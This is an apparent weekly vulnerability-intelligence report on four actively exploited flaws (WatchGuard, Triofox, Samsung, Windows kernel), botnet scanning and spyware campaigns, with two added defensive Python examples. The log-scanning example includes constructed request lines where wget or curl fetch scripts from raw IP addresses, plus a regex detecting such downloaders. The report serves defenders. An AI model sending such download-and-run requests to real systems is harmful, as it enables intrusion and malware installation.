Executive Summary
This week’s threat landscape was defined by a convergence of active vulnerability exploitation and evolving malware operations, with several high-impact flaws tied directly to ongoing campaigns.
CISA added four vulnerabilities affecting WatchGuard Fireware OS, Microsoft Windows Kernel, Gladinet Triofox, and Samsung Mobile Devices to its Known Exploited Vulnerabilities (KEV) catalog, all of which have been weaponized in real-world attacks. These included the LANDFALL spyware targeting Samsung devices via malicious image files, and the UNC6485 threat actor exploiting the Triofox flaw for remote access and privilege escalation, while vulnerabilities in WatchGuard and Windows continued to draw exploitation attempts in the wild.
Complementing these developments, botnet operators such as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st expanded large-scale campaigns targeting exposed cloud services, routers, and web applications, reinforcing a clear pattern of threat actors capitalizing on newly exposed and already-patched weaknesses across multiple environments.
Key points
- 4 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-9242 - Out-of-Bounds Write Vulnerability in WatchGuard Fireware OS
An Out-of-Bounds Write Vulnerability in WatchGuard Fireware OS allows a remote, unauthenticated attacker to execute arbitrary code. Affected builds include 11.10.2 through 11.12.4_Update1, 12.0 through 12.11.3, and 2025.1; the 11.x releases are at end-of-life, while newer builds receive updates. The root cause resides in ike2_ProcessPayload_CERT, where a client identification value is copied into a 520-byte stack buffer without proper length checking, enabling a pre-authentication stack overflow during the IKE_SA_AUTH phase. Public analysis shows the path is reachable pre-authentication and attractive to ransomware operators, with exploitation demonstrated to gain control of the instruction pointer, spawn an interactive Python shell over TCP, and escalate to a full Linux shell. Proof-of-concept code exists, evidence shows active exploitation, and the issue has since been added to the CISA KEV catalog.
CVE-2025-12480 - Improper Access Control Vulnerability in Gladinet Triofox
An Improper Access Control vulnerability in Gladinet Triofox, affecting versions prior to 16.7.10368.56560, allowed unauthenticated attackers to bypass authentication and access restricted configuration pages. The flaw, caused by improper validation of the HTTP Host header, enabled remote execution of arbitrary payloads and the creation of administrative accounts. According to Mandiant, the threat actor UNC6485 exploited this weakness to gain SYSTEM-level privileges, deploy remote access tools such as Zoho Assist and AnyDesk, and establish encrypted SSH tunnels for covert persistence. Gladinet addressed the issue in July 2025 with the release of version 16.7.10368.56560, and the vulnerability was later added to the CISA KEV catalog. Users are strongly advised to update to the latest version and verify system configurations to ensure complete remediation.
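The Triofox flaw above is described as improper validation of the HTTP Host header. The following is an added illustration of that bug class, written for this summary and not taken from Triofox or Gladinet: a weak check that accepts any header value merely containing an expected name, beside a hardened check that requires exactly one Host header whose normalised hostname exactly matches an allowlist. The hostnames in `ALLOWED_HOSTS` are constructed placeholders.

```python
import re
from typing import Iterable, Optional

# Constructed allowlist of hostnames this service expects to be addressed by.
# These are placeholders, not names from the Triofox advisory.
ALLOWED_HOSTS = frozenset({"files.example.internal", "triofox.example.internal"})

# A bare hostname with an optional ":port" suffix. Anything else (scheme,
# path, userinfo, whitespace) fails to match and is rejected outright.
_HOST_RE = re.compile(r"^(?P<host>[a-z0-9.-]+)(?::(?P<port>\d{1,5}))?$")


def weak_is_local_request(host_header: Optional[str]) -> bool:
    """Illustrative weak check: a substring test on the raw header value.

    Any value that merely contains the expected name passes, so the check
    tells the application nothing reliable about which host was addressed.
    Shown only for comparison with the hardened version below.
    """
    return host_header is not None and "localhost" in host_header


def hardened_host_allowed(headers: Iterable[tuple[str, str]],
                          allowlist: frozenset = ALLOWED_HOSTS) -> bool:
    """Return True only if exactly one Host header is present and, after
    trimming, lower-casing and dropping any port, it exactly matches an
    allowlisted hostname."""
    hosts = [v for k, v in headers if k.lower() == "host"]
    if len(hosts) != 1:            # missing or duplicated Host header
        return False
    m = _HOST_RE.match(hosts[0].strip().lower())
    if not m:                      # not a plain hostname[:port]
        return False
    return m.group("host") in allowlist


if __name__ == "__main__":
    print(weak_is_local_request("localhost.example.net"))               # True: substring match
    print(hardened_host_allowed([("Host", "FILES.example.internal:443")]))  # True
    print(hardened_host_allowed([("Host", "localhost.example.net")]))       # False
```

The hardened variant treats a duplicated Host header as a failure rather than picking the first or last one, because the two ends of a proxy chain may disagree about which copy is authoritative.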
CVE-2025-21042 - Out-of-Bounds Write Vulnerability in Samsung Mobile Devices
An Out-of-Bounds Write Vulnerability in Samsung Mobile Devices, affecting versions prior to SMR Apr-2025 Release 1, allowed remote attackers to execute arbitrary code through the libimagecodec.quram.so component. The flaw was exploited as a zero-day in targeted attacks before being patched by Samsung in April 2025. According to Unit 42, the vulnerability was weaponized as part of a sophisticated spyware campaign delivering the LANDFALL framework via malicious DNG image files shared on WhatsApp, enabling data theft and device surveillance. This vulnerability has since been added to the CISA KEV catalog.
CVE-2025-62215 - Race Condition Vulnerability in Microsoft Windows
An Elevation of Privilege (EoP) vulnerability in the Microsoft Windows Kernel allowed authenticated attackers to gain SYSTEM-level privileges by exploiting a race condition arising from improper synchronization during concurrent execution with shared resources. This flaw could be leveraged locally to elevate privileges by successfully winning the race condition. According to Trend Micro, such vulnerabilities are often chained with code execution flaws by malware operators to achieve complete system compromise. Microsoft addressed the issue in its November 2025 Patch Tuesday update, strengthening synchronization controls within the Windows Kernel, and the vulnerability was subsequently added to the CISA KEV catalog to highlight its active exploitation risk.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.
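The paragraph above points to a concrete indicator of botnet activity in exploit traffic: a downloader command such as wget aimed at a literal IP address. As an added example that is not part of the original report, the detector below runs that heuristic over a few constructed web-server log lines (TEST-NET addresses, no real hosts), decoding the request target first so that `+` and `%XX` encodings do not hide the payload. The inclusion of curl alongside wget is an assumption of this example, not something the report states.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample access-log lines. The IPs are documentation ranges
# (RFC 5737), and the paths and payloads are invented for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Nov/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.11 - - [12/Nov/2025:10:01:05 +0000] "POST /cgi-bin/test.cgi?cmd=wget%20http://198.51.100.7/x.sh%20-O%20/tmp/x.sh HTTP/1.1" 404 0
203.0.113.12 - - [12/Nov/2025:10:01:09 +0000] "GET /shell?curl+-s+http://198.51.100.9:8080/bins/arm7+-o+/tmp/a HTTP/1.1" 404 0
203.0.113.13 - - [12/Nov/2025:10:01:12 +0000] "GET /download?url=https://cdn.example.net/pkg.tgz HTTP/1.1" 200 1024
"""

# Common-log-format request line: source address, then "METHOD target HTTP/x.y".
_REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# A downloader command followed, later in the same request, by a URL whose
# host part is a literal dotted-quad rather than a hostname.
_DOWNLOADER_RE = re.compile(
    r"\b(?P<tool>wget|curl)\b.*?"
    r"(?P<url>https?://(?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?::\d{1,5})?[^\s\"']*)",
    re.IGNORECASE,
)


def decode_request_target(target: str) -> str:
    """Undo the encodings typical of scanner payloads: '+' for space, then %XX."""
    return unquote(target.replace("+", " "))


def find_downloader_payload(line: str) -> Optional[dict]:
    """Return details of a wget/curl-to-raw-IP payload in one log line, else None."""
    req = _REQUEST_RE.match(line)
    if not req:
        return None
    decoded = decode_request_target(req.group("target"))
    m = _DOWNLOADER_RE.search(decoded)
    if not m:
        return None
    return {
        "source": req.group("src"),
        "tool": m.group("tool").lower(),
        "payload_host": m.group("ip"),
        "url": m.group("url"),
    }


def scan_log(text: str) -> list[dict]:
    """Apply the detector to every line and collect the hits in order."""
    hits = []
    for line in text.splitlines():
        hit = find_downloader_payload(line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['source']} -> {h['tool']} fetch from {h['payload_host']} ({h['url']})")
```

The last sample line is a legitimate download by hostname and is not flagged; the heuristic deliberately keys on the combination of a downloader command and a raw IP, which is the pattern the report describes, rather than on either feature alone.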
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
CVE-2025-12480 - Improper Access Control Vulnerability in Gladinet Triofox
According to Mandiant, this vulnerability was actively exploited in the wild by a threat actor tracked as UNC6485, a cluster known for targeting enterprise servers to gain remote access and steal credentials. The group exploited the unauthenticated access flaw in Triofox to create administrative accounts, escalate privileges to SYSTEM, and deploy remote-access tools such as Zoho Assist and AnyDesk. The attackers configured the antivirus engine path to execute a malicious batch file, centre_report.bat, which downloaded a Zoho UEMS installer from 84.200.80[.]252 and used it to install these remote-access tools for persistence. To evade detection, UNC6485 also used Plink and PuTTY to establish encrypted SSH tunnels over port 433, enabling covert RDP access and maintaining long-term control within compromised environments.
CVE-2025-21042 - Out-of-Bounds Write Vulnerability in Samsung Mobile Devices
According to Unit 42, the vulnerability was exploited in the wild before Samsung’s April 2025 patch as part of a sophisticated spyware campaign involving a framework named LANDFALL. The campaign distributed malicious DNG (Digital Negative) image files via WhatsApp to exploit the flaw and deploy the spyware on targeted devices. Once installed, LANDFALL operated as a modular surveillance tool capable of recording calls and ambient audio; stealing contacts, SMS, files, and photos; tracking device location; and detecting analysis tools such as Frida and Xposed. It also manipulated WhatsApp’s media directory to maintain persistence. The campaign primarily targeted the Samsung Galaxy S22, S23, and S24 series, along with the Z Fold4 and Z Flip4, and excluded the latest-generation models.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
The week’s findings reaffirm that threat actors are rapidly exploiting both newly disclosed and previously patched vulnerabilities to gain persistence across enterprise and mobile environments. Continuous monitoring and proactive vulnerability intelligence are critical to countering these evolving threats. Loginsoft Vulnerability Intelligence (LOVI) enables organizations to detect, track, and respond to such exploitation trends in real time, strengthening resilience against active campaigns and emerging threats.
FAQs:
1) What is Gladinet Triofox and why is it targeted by threat actors?
A) Gladinet Triofox is an enterprise file-sharing and remote access platform that enables secure cloud connectivity for business data. It is often targeted because it provides direct access to corporate storage and administrative controls, making it valuable for attackers seeking privilege escalation.
2) What is a PRE-NVD vulnerability, and why is it considered effective for early detection?
A) A PRE-NVD vulnerability refers to a security flaw identified before it is officially analyzed and published in the National Vulnerability Database (NVD). It is effective for defenders because it provides early visibility, allowing faster patching and mitigation before widespread disclosure.
3) What does “PoC available” mean, and why does it increase risk for a vulnerability?
A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.
4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?
A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.